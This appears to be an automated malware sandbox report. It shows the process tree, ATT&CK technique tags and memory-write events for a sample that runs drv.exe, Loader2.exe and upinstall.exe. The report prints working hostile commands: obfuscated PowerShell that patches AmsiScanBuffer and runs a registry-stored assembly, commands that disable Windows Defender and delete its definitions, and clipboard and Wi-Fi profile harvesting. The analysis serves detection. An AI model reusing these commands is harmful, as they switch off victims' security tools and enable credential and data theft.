PID 3848 wrote to memory of 568	3848	cmd.exe	102
PID 3848 wrote to memory of 568	3848	cmd.exe	102
PID 988 wrote to memory of 4156	988	cmd.exe	103
PID 988 wrote to memory of 4156	988	cmd.exe	103
PID 1076 wrote to memory of 2368	1076	upinstall.exe	104
PID 1076 wrote to memory of 2368	1076	upinstall.exe	104
PID 1076 wrote to memory of 1012	1076	upinstall.exe	106
PID 1076 wrote to memory of 1012	1076	upinstall.exe	106
PID 1076 wrote to memory of 4496	1076	upinstall.exe	107
PID 1076 wrote to memory of 4496	1076	upinstall.exe	107
PID 1076 wrote to memory of 2344	1076	upinstall.exe	108
PID 1076 wrote to memory of 2344	1076	upinstall.exe	108
PID 1076 wrote to memory of 4880	1076	upinstall.exe	112
PID 1076 wrote to memory of 4880	1076	upinstall.exe	112
PID 1076 wrote to memory of 2212	1076	upinstall.exe	113
PID 1076 wrote to memory of 2212	1076	upinstall.exe	113
PID 1076 wrote to memory of 1964	1076	upinstall.exe	143
PID 1076 wrote to memory of 1964	1076	upinstall.exe	143
PID 1076 wrote to memory of 3000	1076	upinstall.exe	118
PID 1076 wrote to memory of 3000	1076	upinstall.exe	118
PID 2368 wrote to memory of 3596	2368	cmd.exe	159
PID 2368 wrote to memory of 3596	2368	cmd.exe	159
PID 4496 wrote to memory of 3244	4496	cmd.exe	121
PID 4496 wrote to memory of 3244	4496	cmd.exe	121
PID 2344 wrote to memory of 3176	2344	cmd.exe	122
PID 2344 wrote to memory of 3176	2344	cmd.exe	122
PID 1012 wrote to memory of 3112	1012	cmd.exe	123
PID 1012 wrote to memory of 3112	1012	cmd.exe	123
PID 4880 wrote to memory of 1388	4880	cmd.exe	124
PID 4880 wrote to memory of 1388	4880	cmd.exe	124
PID 2212 wrote to memory of 3532	2212	cmd.exe	125
PID 2212 wrote to memory of 3532	2212	cmd.exe	125
PID 1964 wrote to memory of 2996	1964	cmd.exe	126
PID 1964 wrote to memory of 2996	1964	cmd.exe	126
PID 3000 wrote to memory of 1512	3000	cmd.exe	127
PID 3000 wrote to memory of 1512	3000	cmd.exe	127
PID 1076 wrote to memory of 1344	1076	upinstall.exe	150
PID 1076 wrote to memory of 1344	1076	upinstall.exe	150
PID 1076 wrote to memory of 3004	1076	upinstall.exe	131
PID 1076 wrote to memory of 3004	1076	upinstall.exe	131
PID 1344 wrote to memory of 5072	1344	cmd.exe	160
PID 1344 wrote to memory of 5072	1344	cmd.exe	160
PID 1076 wrote to memory of 1136	1076	upinstall.exe	134
PID 1076 wrote to memory of 1136	1076	upinstall.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3372	attrib.exe
2516	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:636
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:744
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ec9a1446-d3ab-495f-b4fa-d7701e1d2bbc}
  2⤵
  PID:3332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8a5447d2-fdf5-43c8-9c05-431acfa5513d}
  2⤵
  PID:988
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 988 -s 340
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:5640

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1152
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:UxLJSTvmjUGg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bESAZwayQLvdeY,[Parameter(Position=1)][Type]$gYxTAAdjxr)$kIlClCWsnmn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+'M'+[Char](111)+'d'+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+'Cla'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+'o'+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$kIlClCWsnmn.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'yS'+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$bESAZwayQLvdeY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+'g'+'ed');$kIlClCWsnmn.DefineMethod('Inv'+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',Hi'+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+'S'+''+'l'+''+'o'+'t,'+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$gYxTAAdjxr,$bESAZwayQLvdeY).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+','+'M'+'a'+'n'+'a'+'g'+'e'+[Char](100)+'');Write-Output $kIlClCWsnmn.CreateType();}$oIWNwjDzdwiLY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+'m.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+'o'+'ft.W'+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+'et'+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$ddykvLMvlOoebw=$oIWNwjDzdwiLY.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'dre'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$akgSYkIjYDixnFMCnTa=UxLJSTvmjUGg @([String])([IntPtr]);$oAMGlXjEonRzCdvIeWmJRy=UxLJSTvmjUGg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JBtfRZqmfnH=$oIWNwjDzdwiLY.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'dle').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+'l'+'')));$ZZPADVTlhCNZSL=$ddykvLMvlOoebw.Invoke($Null,@([Object]$JBtfRZqmfnH,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+'ar'+[Char](121)+''+[Char](65)+'')));$YmafAkBTjQdHwgOyp=$ddykvLMvlOoebw.Invoke($Null,@([Object]$JBtfRZqmfnH,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'alP'+'r'+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$QPSUPNu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZZPADVTlhCNZSL,$akgSYkIjYDixnFMCnTa).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$fvkDOhyOpEvqgMkcL=$ddykvLMvlOoebw.Invoke($Null,@([Object]$QPSUPNu,[Object](''+[Char](65)+'ms'+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+'ffer')));$NRxVDvTVBz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YmafAkBTjQdHwgOyp,$oAMGlXjEonRzCdvIeWmJRy).Invoke($fvkDOhyOpEvqgMkcL,[uint32]8,4,[ref]$NRxVDvTVBz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fvkDOhyOpEvqgMkcL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YmafAkBTjQdHwgOyp,$oAMGlXjEonRzCdvIeWmJRy).Invoke($fvkDOhyOpEvqgMkcL,[uint32]8,0x20,[ref]$NRxVDvTVBz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](114)+''+'s'+''+'t'+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3016
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:wwpKgkMrfysV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fsIxIhUHzgTbQa,[Parameter(Position=1)][Type]$IMmBFAZrla)$YbnQbeWlmIg=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+'l'+'e'+''+[Char](103)+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+'e','C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+'P'+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$YbnQbeWlmIg.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+'S'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$fsIxIhUHzgTbQa).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+'Ma'+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');$YbnQbeWlmIg.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'ke',''+'P'+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IMmBFAZrla,$fsIxIhUHzgTbQa).SetImplementationFlags('Ru'+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+'d'+'');Write-Output $YbnQbeWlmIg.CreateType();}$sgsLKizLmhpzm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+'t'+'e'+'m'+''+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+'.Wi'+'n'+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'t'+[Char](104)+''+'o'+''+[Char](100)+'s');$BUcfMbjhDYMdNZ=$sgsLKizLmhpzm.GetMethod(''+'G'+'e'+[Char](116)+''+'P'+''+'r'+''+[Char](111)+'c'+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c,S'+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mHUwNHhvUBSPEBPhRvQ=wwpKgkMrfysV @([String])([IntPtr]);$pnDwLLMFqwUMCbmayxhcXy=wwpKgkMrfysV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iFTmBkxrvLv=$sgsLKizLmhpzm.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+'l'+'eH'+[Char](97)+''+'n'+''+[Char](100)+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$hWDRsrpmVfRQff=$BUcfMbjhDYMdNZ.Invoke($Null,@([Object]$iFTmBkxrvLv,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'b'+'r'+''+'a'+''+[Char](114)+'yA')));$GykpqoiWApcusOMta=$BUcfMbjhDYMdNZ.Invoke($Null,@([Object]$iFTmBkxrvLv,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$ZZPdZPJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hWDRsrpmVfRQff,$mHUwNHhvUBSPEBPhRvQ).Invoke('a'+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$eIHKjPaEajZvTBJiy=$BUcfMbjhDYMdNZ.Invoke($Null,@([Object]$ZZPdZPJ,[Object]('Ams'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+'B'+'u'+'f'+''+[Char](102)+''+'e'+'r')));$RASNYtNnWE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GykpqoiWApcusOMta,$pnDwLLMFqwUMCbmayxhcXy).Invoke($eIHKjPaEajZvTBJiy,[uint32]8,4,[ref]$RASNYtNnWE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eIHKjPaEajZvTBJiy,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GykpqoiWApcusOMta,$pnDwLLMFqwUMCbmayxhcXy).Invoke($eIHKjPaEajZvTBJiy,[uint32]8,0x20,[ref]$RASNYtNnWE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+[Char](108)+''+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  PID:4040
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1504
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1940

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2044

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2328

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2816

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3088

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3564

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3608
- C:\Users\Admin\AppData\Local\Temp\drv.exe
  "C:\Users\Admin\AppData\Local\Temp\drv.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Users\Admin\AppData\Local\Temp\onefile_2652_133765918344421892\Loader2.exe
    "C:\Users\Admin\AppData\Local\Temp\drv.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\upinstall.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2628
    - - C:\Users\Admin\AppData\upinstall.exe
        
        C:\Users\Admin\AppData\upinstall.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3172
      - C:\Users\Admin\AppData\upinstall.exe
        
        C:\Users\Admin\AppData\upinstall.exe
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\upinstall.exe'"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\upinstall.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3644
        
        C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        8⤵
        Deletes Windows Defender Definitions
        
        PID:1224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:980
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:988
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2368
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        7⤵
        Clipboard Data
        Suspicious use of WriteProcessMemory
        
        PID:1012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        8⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4496
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2344
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:3176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4880
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1388
        
        C:\Windows\system32\cmd.exe
        
